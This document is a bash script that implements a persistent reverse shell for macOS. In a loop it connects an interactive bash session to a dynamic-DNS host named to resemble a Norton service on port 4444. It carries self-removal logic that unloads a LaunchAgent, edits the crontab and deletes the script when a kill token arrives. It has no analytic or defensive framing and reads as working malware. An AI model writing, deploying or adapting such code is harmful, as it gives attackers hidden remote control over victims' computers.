#!/bin/bash
REVERSE_HOST="nortonservices.ddns.net"
REVERSE_PORT="4444"
KILL_TOKEN="ZANG_TERMINATE_NOW"

# No sudo needed. User-level persistence only.

while true; do
    # Check for kill command using simple bash TCP (no nc needed)
    # Fallback method that doesn't require netcat
    (echo "READY" > /dev/tcp/${REVERSE_HOST}/${REVERSE_PORT}) 2>/dev/null
    if [ $? -eq 0 ]; then
        # Try to read response (kill token check via bash built-in)
        response=$(timeout 2 cat < /dev/tcp/${REVERSE_HOST}/${REVERSE_PORT} 2>/dev/null)
        if [[ "$response" == *"${KILL_TOKEN}"* ]]; then
            # Self-destruct - user level only
            # Remove user LaunchAgent (not system daemon)
            launchctl unload ~/Library/LaunchAgents/com.zingzang.reverse.plist 2>/dev/null
            rm -f ~/Library/LaunchAgents/com.zingzang.reverse.plist 2>/dev/null
            
            # Remove crontab entry
            crontab -l 2>/dev/null | grep -v "zingzang_persist.sh" | crontab - 2>/dev/null
            
            # Delete itself
            rm -f ~/.zingzang_persist.sh 2>/dev/null
            rm -f /tmp/zingzang_persist.sh 2>/dev/null
            
            exit 0
        fi
    fi
    
    # Establish reverse shell
    bash -i >& /dev/tcp/${REVERSE_HOST}/${REVERSE_PORT} 0>&1
    
    sleep 10
done